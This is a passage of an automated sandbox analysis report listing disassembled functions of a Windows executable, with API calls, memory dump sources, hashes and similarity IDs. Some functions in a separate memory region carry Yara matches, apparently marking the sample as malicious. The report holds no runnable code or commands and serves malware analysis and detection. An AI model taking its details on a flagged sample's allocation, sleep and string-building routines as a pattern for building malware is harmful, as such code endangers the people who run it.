                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$DestroyHelpWindow
                                    • String ID:
                                    • API String ID: 427501538-0
                                    • Opcode ID: 807b4705cdb1ebe73843774323745dc4056e5ffa6704eb9ee555a8838bb2ca1b
                                    • Instruction ID: a275cf86f64f39b3f8d7c6058c6ab4affededa395906ad69bf6d59ca2fac3d57
                                    • Opcode Fuzzy Hash: 807b4705cdb1ebe73843774323745dc4056e5ffa6704eb9ee555a8838bb2ca1b
                                    • Instruction Fuzzy Hash: 6A31B2B1600219ABC324AF66DC55E6FB7ACFF49348F410A1EF80553351DB39B8058BA9
                                    Function 0043CDC0 Relevance: 7.6, APIs: 5, Instructions: 103synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • midiStreamStop.WINMM(00000000,00000000,005DF0DC,00000000,0043C92A,00000000,005DF380,00432DE6,005DF380,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CDF5
                                    • midiOutReset.WINMM(00000000,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CE13
                                    • WaitForSingleObject.KERNEL32(00000000,000007D0,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CE36
                                    • midiStreamClose.WINMM(00000000,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CE73
                                    • midiStreamClose.WINMM(00000000,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CEA7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: midi$Stream$Close$ObjectResetSingleStopWait
                                    • String ID:
                                    • API String ID: 3142198506-0
                                    • Opcode ID: 5e7f218f82cd643de775e4aa667876e8359c2d8eda6c73dcf04252b0b2357887
                                    • Instruction ID: 083f00f866c252c8260efdc0ef4fc53489fde101cfa8a3493c3911acd6138cde
                                    • Opcode Fuzzy Hash: 5e7f218f82cd643de775e4aa667876e8359c2d8eda6c73dcf04252b0b2357887
                                    • Instruction Fuzzy Hash: 0F314EB27007418FC7309FA9D8C492BB7E6BB98715B105A3FE286D6640C778E845CB98
                                    Function 004B3A7C Relevance: 7.6, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00002020,005D0B80), ref: 004B3A9D
                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010), ref: 004B3AC1
                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010), ref: 004B3ADB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010,?,?), ref: 004B3B9C
                                    • HeapFree.KERNEL32(00000000,00000000,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010,?,?), ref: 004B3BB3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFreeHeap$Allocate
                                    • String ID:
                                    • API String ID: 3000792370-0
                                    • Opcode ID: 959747223d5eefbbb6e9ffc1f328d588d35379fb8ef19cad9b7b1d1f9db14d93
                                    • Instruction ID: 4c28ec2e02e31c0f1f356790306d7c838e115080f4e03f7caaffd70b03498af2
                                    • Opcode Fuzzy Hash: 959747223d5eefbbb6e9ffc1f328d588d35379fb8ef19cad9b7b1d1f9db14d93
                                    • Instruction Fuzzy Hash: 023124706057019FE3308F29DC45BAABBE0FB04769F10423BE595973E1EB78A904D769
                                    Function 0042CA20 Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(?), ref: 0042CA90
                                    • GetMenu.USER32(?), ref: 0042CA9F
                                    • DestroyAcceleratorTable.USER32(?), ref: 0042CAEC
                                    • SetMenu.USER32(?,00000000), ref: 0042CB01
                                    • DestroyMenu.USER32(?,?,?,00428D04,?), ref: 0042CB11
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$Destroy$AcceleratorTableWindow
                                    • String ID:
                                    • API String ID: 1240299919-0
                                    • Opcode ID: e992e31fe51265489427e6fd97d54fffed16f3ab543380082160ea95ee09a7db
                                    • Instruction ID: d67d612e85d15d537a452bf74093598f352b8d1d49f64599d1ed7e9f377dc96a
                                    • Opcode Fuzzy Hash: e992e31fe51265489427e6fd97d54fffed16f3ab543380082160ea95ee09a7db
                                    • Instruction Fuzzy Hash: 2B31EA716002166FC764EF65EC44E6B77A8EF85348F02492DFC4597202EB38F809CBA5
                                    Function 00432660 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsChild.USER32(?,?), ref: 0043267C
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    • GetCursorPos.USER32(?), ref: 00432694
                                    • GetClientRect.USER32(?,?), ref: 004326A3
                                    • PtInRect.USER32(?,?,?), ref: 004326C4
                                    • SetCursor.USER32(?,?,00000000,?,?,?,?,004322F0), ref: 00432742
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ChildCursorRect$ClientParent
                                    • String ID:
                                    • API String ID: 1110532797-0
                                    • Opcode ID: 9a25070c7b18d6f0bfde73c1e59befe634e2892098f01839c6325ace03891266
                                    • Instruction ID: 8670c6fddb78585d3cb83168eb5ede8f67037eb5067bb4105753e639b15b56af
                                    • Opcode Fuzzy Hash: 9a25070c7b18d6f0bfde73c1e59befe634e2892098f01839c6325ace03891266
                                    • Instruction Fuzzy Hash: C121A7316002116BD730EA25DD45F6FB3A8AF98754F144A2EF905A3380E778EC068BA9
                                    Function 004BA011 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BA016
                                    • GetParent.USER32(?), ref: 004BA053
                                    • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 004BA07B
                                    • GetParent.USER32(?), ref: 004BA0A4
                                    • SendMessageA.USER32(?,00000465,00000104,00000000), ref: 004BA0C1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageParentSend$H_prolog
                                    • String ID:
                                    • API String ID: 1056721960-0
                                    • Opcode ID: 24715134d6709e0a0ebceebac326f02f86f4f48dde43b2f5760a62b87c4dd110
                                    • Instruction ID: d5f1b6376bdbe7e604db809f0e8305ba965f4d0c1d3463dd697f456921bba5cd
                                    • Opcode Fuzzy Hash: 24715134d6709e0a0ebceebac326f02f86f4f48dde43b2f5760a62b87c4dd110
                                    • Instruction Fuzzy Hash: E3315E7090021AABCB14EFA5CCD5EFEB774FF50358F10452EA421A71D1EB389905DA69
                                    Function 00415A10 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2F30: __EH_prolog.LIBCMT ref: 004C2F35
                                    • GetClientRect.USER32 ref: 00415A52
                                    • GetWindowRect.USER32(?,?), ref: 00415A61
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2CFE
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2D07
                                    • OffsetRect.USER32(?,?,?), ref: 00415A8C
                                      • Part of subcall function 004C2C27: ExcludeClipRect.GDI32(?,?,?,?,?,753DA5C0,?,?,00415A9C,?), ref: 004C2C4C
                                      • Part of subcall function 004C2C27: ExcludeClipRect.GDI32(?,?,?,?,?,753DA5C0,?,?,00415A9C,?), ref: 004C2C61
                                    • OffsetRect.USER32(?,?,?), ref: 00415AAF
                                    • FillRect.USER32(?,?,?), ref: 00415ACA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Client$ClipExcludeOffsetScreen$FillH_prologWindow
                                    • String ID:
                                    • API String ID: 1774338468-0
                                    • Opcode ID: c7a131d43fdebea98d693f191da27c6ef5e00e5afa866868bc44589020f42b8d
                                    • Instruction ID: 0ce773b2b23152e8487492e21d2b3baa42f1628c6e69d1b4a5959803cee1b590
                                    • Opcode Fuzzy Hash: c7a131d43fdebea98d693f191da27c6ef5e00e5afa866868bc44589020f42b8d
                                    • Instruction Fuzzy Hash: F5315CB5208702AFD754DF24C841FABB7E8EBC8714F008A1DF49687290EB78E905CB56
                                    Function 024247BF Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 024247EE
                                    • lstrlen.KERNEL32(00000000), ref: 024247FB
                                    • lstrcat.KERNEL32(00000000,024A55C4), ref: 0242481A
                                    • lstrcat.KERNEL32(00000000,024A3BE0), ref: 0242482E
                                    • lstrcat.KERNEL32(00000000,024A3FE0), ref: 02424841
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$DirectorySystemlstrlen
                                    • String ID:
                                    • API String ID: 3692445580-0
                                    • Opcode ID: 222391341938c4a426d7b26f48b5c3bcd245642df368a8c1957844663bd57a32
                                    • Instruction ID: 7a85464400d037647c8866120836e2aaee9e93d541211665214e77b8f31f8443
                                    • Opcode Fuzzy Hash: 222391341938c4a426d7b26f48b5c3bcd245642df368a8c1957844663bd57a32
                                    • Instruction Fuzzy Hash: 2F2183B5E80214AFCB28DBA4DC48FEA7B79BB48705F044999F309B7280CB705A55CF64
                                    Function 024248D6 Relevance: 7.6, APIs: 5, Instructions: 67sleepstringthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001000), ref: 0242492A
                                    • Sleep.KERNEL32(00000080), ref: 02424947
                                    • lstrlen.KERNEL32(00000000), ref: 02424961
                                    • Sleep.KERNEL32(0002D000), ref: 0242498B
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024249B8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ExitThreadUserlstrlen
                                    • String ID:
                                    • API String ID: 3026710222-0
                                    • Opcode ID: b7eb78d512b21b85ad76b24587ef83be12b6717fb054659ed0b8630616097c97
                                    • Instruction ID: cdcd602bee5ab8a062d462a6e83c1974201291be93b15c8c2183ae107b818fad
                                    • Opcode Fuzzy Hash: b7eb78d512b21b85ad76b24587ef83be12b6717fb054659ed0b8630616097c97
                                    • Instruction Fuzzy Hash: 43217C70E80318ABDB14CFE5DC49BAEBB74FB08B65F00061AE516A73C0D7795814CB64
                                    Function 00421051 Relevance: 7.6, APIs: 5, Instructions: 61windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000146), ref: 00421062
                                    • SendMessageA.USER32(?,00000146), ref: 0042107D
                                    • SendMessageA.USER32(?,00000146), ref: 00421099
                                    • SendMessageA.USER32(?,00000146), ref: 004210AD
                                    • SendMessageA.USER32(?,0000014E), ref: 004210C2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 3e46a7ca8f9f7e33b0c06e305e983b78aa92da4602572d706369d22486d417ac
                                    • Instruction ID: 8f808d0c928e7c840deea02cec6a67e3c45d23130a9f17835087c5fd16d9c255
                                    • Opcode Fuzzy Hash: 3e46a7ca8f9f7e33b0c06e305e983b78aa92da4602572d706369d22486d417ac
                                    • Instruction Fuzzy Hash: D011C631304A48ABC224DA25EC80E5373B9EB99358F114B1EF142C7690C675B441C762
                                    Function 0041D5B0 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004BACA5: SendMessageA.USER32(?,0000110C,00000000,00000040), ref: 004BACC6
                                    • SendMessageA.USER32(?,0000110A,00000004,?), ref: 0041D5D5
                                    • SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 0041D5F5
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D607
                                    • SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 0041D615
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D627
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
